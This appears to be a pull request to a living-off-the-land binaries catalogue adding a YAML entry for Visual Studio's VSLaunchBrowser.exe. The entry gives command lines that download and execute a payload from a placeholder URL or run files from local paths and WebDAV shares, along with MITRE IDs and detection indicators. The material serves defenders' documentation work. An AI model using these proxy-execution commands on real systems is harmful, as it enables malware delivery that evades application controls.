### PR TITLE
Add VSLaunchBrowser.yml

### DIFF
--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -6,7 +6,7 @@ Created: 2024-04-12
 Commands:
   - Command: VSLaunchBrowser.exe .exe http://example.com/payload
     Description: Download and execute payload from remote server
-    Usecase: It will download a remote file to INetCache and open it using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
+    Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
     Category: Download
     Privileges: User
     MitreID: T1105
@@ -15,14 +15,14 @@ Commands:
       - Download: INetCache
   - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
     Description: Execute payload via VSLaunchBrowser as parent process
-    Usecase: It will open a file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
+    Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
     Category: Execute
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows
   - Command: VSLaunchBrowser.exe .exe \\Server\Path\file
     Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
-    Usecase: It will open a remote file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
+    Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
     Category: Execute
     Privileges: User
     MitreID: T1127
@@ -31,7 +31,7 @@ Full_Path:
   - Path: C:\Program Files\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
   - Path: C:\Program Files (x86)\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
 Detection:
-  - IOC: CMD as sub-process of VSLaunchBrowser
+  - IOC: cmd.exe as sub-process of VSLaunchBrowser
   - IOC: URL on a VSLaunchBrowser command line
   - IOC: VSLaunchBrowser making unexpected network connections or DNS requests
 Acknowledgement:

--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -2,7 +2,7 @@
 Name: VSLaunchBrowser.exe
 Description: Microsoft Visual Studio browser launcher tool for web applications debugging
 Author: Avihay Eldad
-Created: 2024-04-13
+Created: 2024-04-12
 Commands:
   - Command: VSLaunchBrowser.exe .exe http://example.com/payload
     Description: Download and execute payload from remote server
@@ -13,7 +13,6 @@ Commands:
     OperatingSystem: Windows
     Tags:
       - Download: INetCache
-    OperatingSystem: Windows
   - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
     Description: Execute payload via VSLaunchBrowser as parent process
     Usecase: It will open a file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.

--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -2,11 +2,11 @@
 Name: VSLaunchBrowser.exe
 Description: Microsoft Visual Studio browser launcher tool for web applications debugging
 Author: Avihay Eldad
-Created: 2024-04-12
+Created: 2024-04-13
 Commands:
   - Command: VSLaunchBrowser.exe .exe http://example.com/payload
     Description: Download and execute payload from remote server
-    Usecase: It will download a remote file to INetCache and open it using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Usecase: It will download a remote file to INetCache and open it using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
     Category: Download
     Privileges: User
     MitreID: T1105
@@ -16,14 +16,14 @@ Commands:
     OperatingSystem: Windows
   - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
     Description: Execute payload via VSLaunchBrowser as parent process
-    Usecase: It will open a file using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Usecase: It will open a file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
     Category: Execute
     Privileges: User
     MitreID: T1127
     OperatingSystem: Windows
   - Command: VSLaunchBrowser.exe .exe \\Server\Path\file
     Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
-    Usecase: It will open a remote file using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Usecase: It will open a remote file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
     Category: Execute
     Privileges: User
     MitreID: T1127

--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -1,0 +1,40 @@
+---
+Name: VSLaunchBrowser.exe
+Description: Microsoft Visual Studio browser launcher tool for web applications debugging
+Author: Avihay Eldad
+Created: 2024-04-12
+Commands:
+  - Command: VSLaunchBrowser.exe .exe http://example.com/payload
+    Description: Download and execute payload from remote server
+    Usecase: It will download a remote file to INetCache and open it using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows
+    Tags:
+      - Download: INetCache
+    OperatingSystem: Windows
+  - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
+    Description: Execute payload via VSLaunchBrowser as parent process
+    Usecase: It will open a file using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+  - Command: VSLaunchBrowser.exe .exe \\Server\Path\file
+    Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
+    Usecase: It will open a remote file using the default app associate with the supplied file extension (for example: .exe -> cmd, .txt -> notepad, .html -> browser, etc.) via VSLaunchBrowser as parent process.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
+Detection:
+  - IOC: CMD as sub-process of VSLaunchBrowser
+  - IOC: URL on a VSLaunchBrowser command line
+  - IOC: VSLaunchBrowser making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'


### PR DESCRIPTION
Microsoft Visual Studio browser launcher tool for web applications debugging (VSLaunchBrowser.exe) can be used to download (INetCahce) and execute files (Local & Remote) via proxy execution of default app processes with VSLaunchBrowser as parent process.

It will download and open the file using the default application associated with the supplied file extension on the system.

For example: 
Executable extensions -> cmd
Web page extensions -> browser
Text file extensions -> notepad
etc..

Download & execute remote payload (INetCahce):
![inetcahce](https://github.com/LOLBAS-Project/LOLBAS/assets/46644022/f9adf445-c6e1-44fa-a120-15787babfbab)

Execute local payload:
![local](https://github.com/LOLBAS-Project/LOLBAS/assets/46644022/74b6fd0c-6e57-486a-ab03-c38601c02b4e)

Execute remote payload (WebDAV):
![webdav](https://github.com/LOLBAS-Project/LOLBAS/assets/46644022/6aefa952-82b3-4772-aca5-8e6349258357)

